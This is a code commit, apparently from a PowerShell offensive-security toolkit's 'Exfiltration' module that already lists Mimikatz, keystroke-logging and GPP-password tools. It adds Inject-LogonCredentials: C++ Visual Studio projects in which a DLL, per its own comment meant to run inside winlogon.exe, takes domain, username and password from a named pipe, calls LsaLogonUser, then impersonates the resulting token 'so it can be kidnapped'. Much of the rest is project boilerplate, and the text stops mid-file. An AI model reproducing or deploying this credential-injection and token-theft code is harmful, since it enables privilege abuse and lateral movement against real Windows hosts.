Adding Inject-LogonCredentials

Exfiltration/Exfiltration.psd1

@@ -75,7 +75,7 @@ ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID =
 # List of all files packaged with this module
 FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1',
            'Get-Keystrokes.ps1', 'Get-GPPPassword.ps1', 'Usage.md', 'Invoke-Mimikatz.ps1',
-		   'Invoke-NinjaCopy.ps1', 'Invoke-TokenManipulation.ps1'
+		   'Invoke-NinjaCopy.ps1', 'Invoke-TokenManipulation.ps1', 'Inject-LogonCredentials.ps1'
 
 # Private data to pass to the module specified in RootModule/ModuleToProcess
 # PrivateData = ''

Exfiltration/LogonUser/LogonUser/LogonUser.sln

@@ -0,0 +1,26 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2012
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "logon", "logon\logon.vcxproj", "{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Debug|x64 = Debug|x64
+		Release|Win32 = Release|Win32
+		Release|x64 = Release|x64
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.ActiveCfg = Debug|Win32
+		{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.Build.0 = Debug|Win32
+		{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.ActiveCfg = Debug|x64
+		{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.Build.0 = Debug|x64
+		{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.ActiveCfg = Release|Win32
+		{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.Build.0 = Release|Win32
+		{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.ActiveCfg = Release|x64
+		{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.Build.0 = Release|x64
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.cpp

@@ -0,0 +1,137 @@
+// LogonUser.cpp : Defines the entry point for the console application.
+//
+
+#include "stdafx.h"
+
+using namespace std;
+
+size_t wcsByteLen( const wchar_t* str );
+void InitUnicodeString( UNICODE_STRING& str, const wchar_t* value, BYTE* buffer, size_t& offset );
+PVOID CreateNtlmLogonStructure(wstring domain, wstring username, wstring password, DWORD* size);
+size_t WriteUnicodeString(wstring str, UNICODE_STRING* uniStr, PVOID baseAddress, size_t offset);
+
+int _tmain(int argc, _TCHAR* argv[])
+{
+	//Get a handle to LSA
+	HANDLE hLSA = NULL;
+	NTSTATUS status = LsaConnectUntrusted(&hLSA);
+	if (status != 0)
+	{
+		cout << "Error calling LsaConnectUntrusted. Error code: " << status << endl;
+		return -1;
+	}
+	if (hLSA == NULL)
+	{
+		cout << "hLSA is NULL, this shouldn't ever happen" << endl;
+		return -1;
+	}
+
+	//Build LsaLogonUser parameters
+	LSA_STRING originName = {};
+	char originNameStr[] = "qpqp";
+	originName.Buffer = originNameStr;
+	originName.Length = (USHORT)strlen(originNameStr);
+	originName.MaximumLength = originName.Length;
+
+	ULONG authPackage = 0;
+	PLSA_STRING authPackageName = new LSA_STRING();
+	char authPackageBuf[] = MSV1_0_PACKAGE_NAME;
+	authPackageName->Buffer = authPackageBuf;
+	authPackageName->Length = (USHORT)strlen(authPackageBuf);
+	authPackageName->MaximumLength = (USHORT)strlen(authPackageBuf);
+	status = LsaLookupAuthenticationPackage(hLSA, authPackageName, &authPackage);
+	if (status != 0)
+	{
+		int winError = LsaNtStatusToWinError(status);
+		cout << "Call to LsaLookupAuthenticationPackage failed. Error code: " << winError;
+		return -1;
+	}
+
+	DWORD authBufferSize = 0;
+	PVOID authBuffer = CreateNtlmLogonStructure(L"VMWORKSTATION", L"testuser", L"Password1", &authBufferSize);
+		cout << "authBufferSize: " << authBufferSize << endl;
+
+	//Get TokenSource
+	HANDLE hProcess = GetCurrentProcess();//todo
+	HANDLE procToken = NULL;
+	BOOL success = OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &procToken);
+	if (!success)
+	{
+		DWORD errorCode = GetLastError();
+		cout << "Call to OpenProcessToken failed. Errorcode: " << errorCode << endl;
+		return -1;
+	}
+
+	TOKEN_SOURCE tokenSource = {};
+	DWORD realSize = 0;
+	success = GetTokenInformation(procToken, TokenSource, &tokenSource, sizeof(tokenSource), &realSize);
+	if (!success)
+	{
+		cout << "Call to GetTokenInformation failed." << endl;
+		return -1;
+	}
+
+
+	//Misc
+	PVOID profileBuffer = NULL;
+	ULONG profileBufferSize = 0;
+	LUID loginId;
+	HANDLE token = NULL;
+	QUOTA_LIMITS quotaLimits;
+	NTSTATUS subStatus = 0;
+
+	status = LsaLogonUser(hLSA, 
+		&originName, 
+		RemoteInteractive, 
+		authPackage, 
+		authBuffer,
+		authBufferSize, 
+		0, 
+		&tokenSource, 
+		&profileBuffer,
+		&profileBufferSize,
+		&loginId,
+		&token,
+		&quotaLimits,
+		&subStatus);
+
+	if (status != 0)
+	{
+		NTSTATUS winError = LsaNtStatusToWinError(status);
+		cout << "Error calling LsaLogonUser. Error code: " << winError << endl;
+		return -1;
+	}
+
+	cout << "Success!" << endl;
+
+	return 1;
+}
+
+//size will be set to the size of the structure created
+PVOID CreateNtlmLogonStructure(wstring domain, wstring username, wstring password, DWORD* size)
+{
+	size_t wcharSize = sizeof(wchar_t);
+
+	size_t totalSize = sizeof(MSV1_0_INTERACTIVE_LOGON) + ((domain.length() + username.length() + password.length()) * wcharSize);
+	MSV1_0_INTERACTIVE_LOGON* ntlmLogon = (PMSV1_0_INTERACTIVE_LOGON)(new BYTE[totalSize]);
+	size_t offset = sizeof(MSV1_0_INTERACTIVE_LOGON);
+
+	ntlmLogon->MessageType = MsV1_0InteractiveLogon;
+	offset += WriteUnicodeString(domain, &(ntlmLogon->LogonDomainName), ntlmLogon, offset);
+	offset += WriteUnicodeString(username, &(ntlmLogon->UserName), ntlmLogon, offset);
+	offset += WriteUnicodeString(password, &(ntlmLogon->Password), ntlmLogon, offset);
+
+	*size = (DWORD)totalSize; //If the size is bigger than a DWORD, there is a gigantic bug somewhere.
+	return ntlmLogon;
+}
+
+size_t WriteUnicodeString(wstring str, UNICODE_STRING* uniStr, PVOID baseAddress, size_t offset)
+{
+	const wchar_t* buffer = str.c_str();
+	size_t size = str.length() * sizeof(wchar_t);
+	uniStr->Length = (USHORT)size;
+	uniStr->MaximumLength = (USHORT)size;
+	uniStr->Buffer = (PWSTR)((UINT_PTR)baseAddress + offset);
+	memcpy((PVOID)((UINT_PTR)baseAddress + offset), str.c_str(), size);
+	return size;
+}

Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj

@@ -0,0 +1,158 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{F9DC2AAF-2213-4D87-9F52-283DA1CC6E18}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>LogonUser</RootNamespace>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v110</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v110</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v110</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v110</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <Text Include="ReadMe.txt" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="targetver.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="LogonUser.cpp" />
+    <ClCompile Include="stdafx.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>

Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj.filters

@@ -0,0 +1,36 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <Text Include="ReadMe.txt" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="targetver.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="stdafx.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="LogonUser.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+</Project>

Exfiltration/LogonUser/LogonUser/LogonUser/ReadMe.txt

@@ -0,0 +1,40 @@
+========================================================================
+    CONSOLE APPLICATION : LogonUser Project Overview
+========================================================================
+
+AppWizard has created this LogonUser application for you.
+
+This file contains a summary of what you will find in each of the files that
+make up your LogonUser application.
+
+
+LogonUser.vcxproj
+    This is the main project file for VC++ projects generated using an Application Wizard.
+    It contains information about the version of Visual C++ that generated the file, and
+    information about the platforms, configurations, and project features selected with the
+    Application Wizard.
+
+LogonUser.vcxproj.filters
+    This is the filters file for VC++ projects generated using an Application Wizard. 
+    It contains information about the association between the files in your project 
+    and the filters. This association is used in the IDE to show grouping of files with
+    similar extensions under a specific node (for e.g. ".cpp" files are associated with the
+    "Source Files" filter).
+
+LogonUser.cpp
+    This is the main application source file.
+
+/////////////////////////////////////////////////////////////////////////////
+Other standard files:
+
+StdAfx.h, StdAfx.cpp
+    These files are used to build a precompiled header (PCH) file
+    named LogonUser.pch and a precompiled types file named StdAfx.obj.
+
+/////////////////////////////////////////////////////////////////////////////
+Other notes:
+
+AppWizard uses "TODO:" comments to indicate parts of the source code you
+should add to or customize.
+
+/////////////////////////////////////////////////////////////////////////////

Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.cpp

@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// LogonUser.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file

Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.h

@@ -0,0 +1,20 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+#include <stdio.h>
+#include <tchar.h>
+#include <iostream>
+#include <string>
+#include <Windows.h>
+#include <NTSecAPI.h>
+
+
+
+
+
+// TODO: reference additional headers your program requires here

Exfiltration/LogonUser/LogonUser/LogonUser/targetver.h

@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>

Exfiltration/LogonUser/LogonUser/logon/ReadMe.txt

@@ -0,0 +1,48 @@
+========================================================================
+    DYNAMIC LINK LIBRARY : logon Project Overview
+========================================================================
+
+AppWizard has created this logon DLL for you.
+
+This file contains a summary of what you will find in each of the files that
+make up your logon application.
+
+
+logon.vcxproj
+    This is the main project file for VC++ projects generated using an Application Wizard.
+    It contains information about the version of Visual C++ that generated the file, and
+    information about the platforms, configurations, and project features selected with the
+    Application Wizard.
+
+logon.vcxproj.filters
+    This is the filters file for VC++ projects generated using an Application Wizard. 
+    It contains information about the association between the files in your project 
+    and the filters. This association is used in the IDE to show grouping of files with
+    similar extensions under a specific node (for e.g. ".cpp" files are associated with the
+    "Source Files" filter).
+
+logon.cpp
+    This is the main DLL source file.
+
+	When created, this DLL does not export any symbols. As a result, it
+	will not produce a .lib file when it is built. If you wish this project
+	to be a project dependency of some other project, you will either need to
+	add code to export some symbols from the DLL so that an export library
+	will be produced, or you can set the Ignore Input Library property to Yes
+	on the General propert page of the Linker folder in the project's Property
+	Pages dialog box.
+
+/////////////////////////////////////////////////////////////////////////////
+Other standard files:
+
+StdAfx.h, StdAfx.cpp
+    These files are used to build a precompiled header (PCH) file
+    named logon.pch and a precompiled types file named StdAfx.obj.
+
+/////////////////////////////////////////////////////////////////////////////
+Other notes:
+
+AppWizard uses "TODO:" comments to indicate parts of the source code you
+should add to or customize.
+
+/////////////////////////////////////////////////////////////////////////////

Exfiltration/LogonUser/LogonUser/logon/dllmain.cpp

@@ -0,0 +1,19 @@
+// dllmain.cpp : Defines the entry point for the DLL application.
+#include "stdafx.h"
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+					 )
+{
+	switch (ul_reason_for_call)
+	{
+	case DLL_PROCESS_ATTACH:
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+	case DLL_PROCESS_DETACH:
+		break;
+	}
+	return TRUE;
+}
+

Exfiltration/LogonUser/LogonUser/logon/logon.cpp

@@ -0,0 +1,258 @@
+// logon.cpp : Defines the exported functions for the DLL application.
+//
+
+#include "stdafx.h"
+
+using namespace std;
+
+size_t wcsByteLen( const wchar_t* str );
+void InitUnicodeString( UNICODE_STRING& str, const wchar_t* value, BYTE* buffer, size_t& offset );
+PVOID CreateKerbLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size);
+PVOID CreateNtlmLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size);
+size_t WriteUnicodeString(const wchar_t* str, UNICODE_STRING* uniStr, PVOID address);
+void WriteErrorToPipe(string errorMsg, HANDLE pipe);
+
+extern "C" __declspec( dllexport ) void VoidFunc();
+
+
+//The entire point of this code is to call LsaLogonUser from within winlogon.exe
+extern "C" __declspec( dllexport ) void VoidFunc()
+{
+	//Open a pipe which will receive data from the PowerShell script.
+	HANDLE pipe = CreateFile(L"\\\\.\\pipe\\sqsvc", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+	if (pipe == INVALID_HANDLE_VALUE)
+	{
+		return;
+	}
+
+	const size_t strSize = 257;
+	size_t bytesToRead = strSize * sizeof(wchar_t) - sizeof(wchar_t);
+	wchar_t* domain = new wchar_t[strSize];
+	wchar_t* username = new wchar_t[strSize];
+	wchar_t* password = new wchar_t[strSize];
+	DWORD bytesRead = 0;
+
+	BOOL success = ReadFile(pipe, domain, strSize, &bytesRead, NULL);
+	if (!success)
+	{
+		return;
+	}
+	domain[bytesRead/2] = '\0';
+
+	success = ReadFile(pipe, username, strSize-2, &bytesRead, NULL);
+	if (!success)
+	{
+		return;
+	}
+	username[bytesRead/2] = '\0';
+
+	success = ReadFile(pipe, password, strSize-2, &bytesRead, NULL);
+	if (!success)
+	{
+		return;
+	}
+	password[bytesRead/2] = '\0';
+
+	//Get the logon type from the pipe
+	USHORT logonType = 10;
+	success = ReadFile(pipe, &logonType, 1, &bytesRead, NULL);
+	if (!success)
+	{
+		return;
+	}
+
+	//Get the authentication package to use. 1 = Msv1_0, 2 = Kerberos
+	USHORT authPackageToUse = 0;
+	success = ReadFile(pipe, &authPackageToUse, 1, &bytesRead, NULL);
+	if (!success)
+	{
+		return;
+	}
+	
+
+	/////////////
+	//Build the parameters to call LsaLogonUser with
+	/////////////
+
+	//Get a handle to LSA
+	HANDLE hLSA = NULL;
+	NTSTATUS status = LsaConnectUntrusted(&hLSA);
+	if (status != 0)
+	{
+		string errorMsg = "Error calling LsaConnectUntrusted. Error code: " + to_string(status);
+		WriteErrorToPipe(errorMsg, pipe);
+		return;
+	}
+	if (hLSA == NULL)
+	{
+		string errorMsg = "hLSA (LSA handle) is NULL, this shouldn't ever happen.";
+		WriteErrorToPipe(errorMsg, pipe);
+		return;
+	}
+
+	//Build LsaLogonUser parameters
+	LSA_STRING originName = {};
+	char originNameStr[] = "";
+	originName.Buffer = originNameStr;
+	originName.Length = (USHORT)0;
+	originName.MaximumLength = 0;
+
+	//Build the authentication package parameter based on the auth package the powershell script specified to use
+	//Also get the AuthenticationInformation
+	char* authPackageBuf = NULL;
+	DWORD authBufferSize = 0;
+	PVOID authBuffer = NULL;
+	if (authPackageToUse == 1)
+	{
+		authPackageBuf = MSV1_0_PACKAGE_NAME;
+		authBuffer = CreateNtlmLogonStructure(domain, username, password, &authBufferSize);
+	}
+	else if (authPackageToUse == 2)
+	{
+		authPackageBuf = MICROSOFT_KERBEROS_NAME_A;
+		authBuffer = CreateKerbLogonStructure(domain, username, password, &authBufferSize);
+	}
+	else
+	{
+		string errorMsg = "Received an invalid auth package from the named pipe";
+		WriteErrorToPipe(errorMsg, pipe);
+		return;
+	}
+
+	ULONG authPackage = 0;
+	PLSA_STRING authPackageName = new LSA_STRING();
+	authPackageName->Buffer = authPackageBuf;
+	authPackageName->Length = (USHORT)strlen(authPackageBuf);
+	authPackageName->MaximumLength = (USHORT)strlen(authPackageBuf);
+	status = LsaLookupAuthenticationPackage(hLSA, authPackageName, &authPackage);
+	if (status != 0)
+	{
+		int winError = LsaNtStatusToWinError(status);
+		string errorMsg = "Call to LsaLookupAuthenticationPackage failed. Error code: " + to_string(winError);
+		WriteErrorToPipe(errorMsg, pipe);
+		return;
+	}
+
+	//Get TokenSource
+	HANDLE hProcess = GetCurrentProcess();//todo
+	HANDLE procToken = NULL;
+	success = OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &procToken);
+	if (!success)
+	{
+		DWORD errorCode = GetLastError();
+		string errorMsg = "Call to OpenProcessToken failed. Errorcode: " + to_string(errorCode);
+		WriteErrorToPipe(errorMsg, pipe);
+		return;
+	}
+
+	TOKEN_SOURCE tokenSource = {};
+	DWORD realSize = 0;
+	success = GetTokenInformation(procToken, TokenSource, &tokenSource, sizeof(tokenSource), &realSize);
+	if (!success)
+	{
+		string errorMsg = "Call to GetTokenInformation failed.";
+		WriteErrorToPipe(errorMsg, pipe);
+		return;
+	}
+
+	//Misc out parameters
+	PVOID profileBuffer = NULL;
+	ULONG profileBufferSize = 0;
+	LUID loginId;
+	HANDLE token = NULL;
+	QUOTA_LIMITS quotaLimits;
+	NTSTATUS subStatus = 0;
+
+	//Log on the user
+	status = LsaLogonUser(hLSA, 
+		&originName, 
+		static_cast<SECURITY_LOGON_TYPE>(logonType), 
+		authPackage, 
+		authBuffer,
+		authBufferSize, 
+		0, 
+		&tokenSource, 
+		&profileBuffer,
+		&profileBufferSize,
+		&loginId,
+		&token,
+		&quotaLimits,
+		&subStatus);
+
+	if (status != 0)
+	{
+		NTSTATUS winError = LsaNtStatusToWinError(status);
+		string errorMsg = "Error calling LsaLogonUser. Error code: " + to_string(winError);
+		WriteErrorToPipe(errorMsg, pipe);
+		return;
+	}
+
+	
+	//Impersonate the token with the current thread so it can be kidnapped
+	ImpersonateLoggedOnUser(token);
+
+	//Put the thread to sleep so it can be impersonated
+	string successMsg = "Logon succeeded, impersonating the token so it can be kidnapped and starting an infinite loop with the thread.";
+	WriteErrorToPipe(successMsg, pipe);
+	HANDLE permenantSleep = CreateMutex(NULL, false, NULL);
+	while(1)
+	{
+		Sleep(MAXDWORD);
+	}
+
+	return;
+}
+
+
+PVOID CreateKerbLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size)
+{
+	size_t wcharSize = sizeof(wchar_t);
+
+	size_t totalSize = sizeof(KERB_INTERACTIVE_LOGON) + ((lstrlenW(domain) + lstrlenW(username) + lstrlenW(password)) * wcharSize);
+	KERB_INTERACTIVE_LOGON* ntlmLogon = (PKERB_INTERACTIVE_LOGON)(new BYTE[totalSize]);
+	size_t writeAddress = (UINT_PTR)ntlmLogon + sizeof(KERB_INTERACTIVE_LOGON);
+
+	ntlmLogon->MessageType = KerbInteractiveLogon;
+	writeAddress += WriteUnicodeString(domain, &(ntlmLogon->LogonDomainName), (PVOID)writeAddress);
+	writeAddress += WriteUnicodeString(username, &(ntlmLogon->UserName), (PVOID)writeAddress);
+	writeAddress += WriteUnicodeString(password, &(ntlmLogon->Password), (PVOID)writeAddress);
+
+	*size = (DWORD)totalSize; //If the size is bigger than a DWORD, there is a gigantic bug somewhere.
+	return ntlmLogon;
+}
+
+
+PVOID CreateNtlmLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size)
+{
+	size_t wcharSize = sizeof(wchar_t);
+
+	size_t totalSize = sizeof(MSV1_0_INTERACTIVE_LOGON) + ((lstrlenW(domain) + lstrlenW(username) + lstrlenW(password)) * wcharSize);
+	MSV1_0_INTERACTIVE_LOGON* ntlmLogon = (PMSV1_0_INTERACTIVE_LOGON)(new BYTE[totalSize]);
+	size_t writeAddress = (UINT_PTR)ntlmLogon + sizeof(MSV1_0_INTERACTIVE_LOGON);
+
+	ntlmLogon->MessageType = MsV1_0InteractiveLogon;
+	writeAddress += WriteUnicodeString(domain, &(ntlmLogon->LogonDomainName), (PVOID)writeAddress);
+	writeAddress += WriteUnicodeString(username, &(ntlmLogon->UserName), (PVOID)writeAddress);
+	writeAddress += WriteUnicodeString(password, &(ntlmLogon->Password), (PVOID)writeAddress);
+
+	*size = (DWORD)totalSize; //If the size is bigger than a DWORD, there is a gigantic bug somewhere.
+	return ntlmLogon;
+}
+
+//Returns the amount of bytes written.
